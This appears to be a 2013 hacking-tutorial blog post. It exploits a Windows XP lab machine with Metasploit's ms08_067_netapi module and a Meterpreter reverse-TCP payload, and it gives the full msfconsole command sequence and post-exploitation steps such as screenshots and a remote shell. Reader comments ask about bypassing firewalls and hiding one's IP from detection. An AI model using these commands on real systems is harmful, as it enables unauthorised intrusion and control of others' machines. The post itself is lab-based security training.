Saturday, March 30, 2013

How To Practice Hacking Without Getting Into Trouble - Part 2 (Hacking With Metasploit)

In Part 1, we learnt how to setup a hacking lab to practice hacking since our objective is to hack without disrupting any real network or services.  Now, in this article, I will discuss ways to actually start hacking on your own. Please note that I will be using Metasploit as the primary hacking tool. Metasploit is a huge  collection of ready-to-use exploits which makes life easier for a penetration tester or ethical hacker. Metasploit comes pre-installed with Backtrack, so you don't need to do any extra installation. However, if you want to use a Windows machine as the attacker machine, you can download Metasploit for windows also (around 390MB).

In this hack, I will be hacking Windows XP using the famous netapi exploit.(don’t worry if you don’t know what that is). I'm showing this exploit because it works every time, and it is easy to demonstrate, especially for beginners.

I will be using Backtrack as an attacker and Windows XP as a victim as configured  in part 1.
Startup the Backtrack Machine and login with the username- root and password- toor

After that, type startx to start the GUI window. Now, you are greeted with the Backtrack Interface.  You can browse through all the menus and try out all the tools.
First, we will perform a port scan to see open ports and (hopefully) find out the victim's Operating System.  Type nmap -O       like so-

Now, we know that our victim is Running Windows XP SP2 or Windows Server 2003 and the port 445 is open. So, we can run the  netapi exploit using Metaspolit.

Start Metasploit by going to Start Menu->BackTrack->Exploitation Tools->Network Exploitation Tools->Metasploit Framework->msfconsole

Alternatively, you can open a terminal and type-  msfconsole

You now have the Metasploit console open and can start typing in commands. 

Type the following-

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST
msf exploit(ms08_067_netapi) > set RHOST
msf exploit(ms08_067_netapi) > exploit

Note: LHOST means your IP address. RHOST means the victim's IP address.

After typing all that, if you  see a meterpreter shell open like below, then  congratulations!
 It means you were successful in exploiting the XP system.

Meterpreter is a reverse shell we opened after exploiting the victim's computer. Now that you have a Meterpreter shell, you can do virtually anything with that system. 

Type help to see all available commands.
Lets grab a screenshot of the victim, type screenshot

In order to get the command prompt of the remote system, type shell.  After you get shell, type ipconfig   to prove that you are indeed in the XP system. You can now do virtually anything with the system.

If you have done all the steps correctly, then you just managed your first actual hack with Metasploit.  This is just the beginning. You can find more exploits for Windows XP and Windows 7 also. Install a Windows 7 virtual machine and keep trying out new exploits. In this tutorial, we learnt how to use Metasploit to run a basic exploit to hack a remote computer in the LAN, which means you successfully performed your first network hack. I highly suggest you try out this hack as it will really help you in getting started in the world of hacking. 
In order to learn more about Metasploit, you can visit

Note: You have to regularly update  Metasploit to get the latest exploits by typing - msfupdate.  However, since we have used VirtualBox Host Only Adapter, there is no internet connectivity. In order to connect BackTrack to the internet, power it off and reset the Adapter to NAT (In Network Settings, VirtualBox Menu)


  1. What if the firewall is active on the target system how to bypass it to get the port ?

  2. please somebody tell me how to hide undetectable ip,because google is detecting my proxy , i used hotspot,tor and other also

  3. pm me at my email adress

  4. I liked the way you put together everything, there is certainly no need to go any further to look for any additional information. You mentioned each and everything that too with much of ease. true online jobs